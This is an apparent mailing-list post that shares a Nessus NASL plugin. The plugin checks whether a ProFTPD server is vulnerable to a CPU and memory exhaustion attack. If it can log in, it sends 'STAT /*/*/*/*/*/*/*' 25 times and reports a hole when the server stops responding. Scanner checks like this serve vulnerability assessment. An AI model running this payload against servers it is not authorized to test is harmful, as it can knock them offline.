New ProFTPD exhaustion attack

["Michel Arboi" <arboi_at_noos.fr>]

I just hacked proftpd_exhaust.nasl...

#
# This script was written by Michel Arboi <arboi_at_algoriel.fr>
# starting from proftd_exhaust.nasl by Renaud Deraison
# 
# GNU Public Licence
#
# References:
# Date: Sun, 8 Dec 2002 13:53:57 +0100 (MET)
# From:"Rob klein Gunnewiek" <rmkleing_at_hio.hen.nl>
# To:bugtraq_at_securityfocus.com, vulnwatch_at_vulnwatch.org
# Subject: proftpd <=1.2.7rc3 DoS
#
# 


if(description)
{
 script_id(11189);
 script_version ("$Revision$");

 
 name["english"] = "proftpd /*/* exhaustion attack";
 name["francais"] = "proftpd /*/* exhaustion attack";
 
 script_name(english:name["english"],
             francais:name["francais"]);
             
 desc["english"] = "
The remote FTP server seems to be vulnerable to an exhaustion
attack which may makes it consume all available memory and CPU
on the remote host when it receives several times the command :

	STAT /*/*/*/*/*/*/*
	

Solution : upgrade to ProFTPd 1.2.7 if the remote server is proftpd,
or contact your vendor for a patch.

Risk factor : High";
                 
                 
desc["francais"] = "
Le serveur FTP distant semble vulnérable à une attaque lui faisant
consommer toutes les ressources de la machine distante lorsqu'il 
reçoit plusieurs fois la commande :

	STAT /*/*/*/*/*/*/*

Solution : Si le serveur distant est ProFTPd, alors passez en 
version 1.2.7, sinon contactez votre vendeur pour un patch

Facteur de risque : Elevé";
                     
 script_description(english:desc["english"],
                    francais:desc["francais"]);
                    
 
 script_summary(english:"Sends /*/*/*/* to the remote proftpd",
                francais:"Envoie /*/*/*/* au proftpd distant");
 script_category(ACT_ATTACK);
 script_family(english:"FTP", francais:"FTP");

 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
                  francais:"Ce script est Copyright (C) 2002 Michel Arboi");
                  
 script_dependencie("find_service.nes", "ftp_anonymous.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#

port = get_kb_item("Services/ftp");
if(!port)port = 21;
if(!get_port_state(port))exit(0);
login = get_kb_item("ftp/login");
pass  = get_kb_item("ftp/password");

if(!login)
{
 # Connect to the FTP server - I'm not sure of the banner
 soc = open_sock_tcp(port);
 if(soc)
 {
  r = recv(socket:soc, length:1024);
  if(ereg(pattern:"^220 ProFTPD ((1\.1\.)|(1\.2\.[0-6])|(1\.2\.7rc)",
          string:r))security_hole(port);
  close(soc);
 }
 exit(0);
}

req = string("STAT /*/*/*/*/*/*/*\r\n");

soc = open_sock_tcp(port);
if(! soc) exit(0);

for (i = 0; i < 25; i=i+1)
{
  if(ftp_log_in(socket:soc, user:login, pass:pass))
  {
     pasv_port = ftp_get_pasv_port(socket:soc);
     soc2 = open_sock_tcp(pasv_port, transport:get_port_transport(port));
     send(socket:soc, data:req);
     code = recv_line(socket:soc, length:4096, timeout:3);
     data = recv(socket:soc2, length:4096, timeout:3);
     send(socket:soc, data:string("QUIT\r\n\r\n"));
     close(soc);
     close(soc2);
  }
  sleep(1);
  soc = open_sock_tcp(port);
  if(! soc) { security_hole(port); exit(0); }
}

close(soc);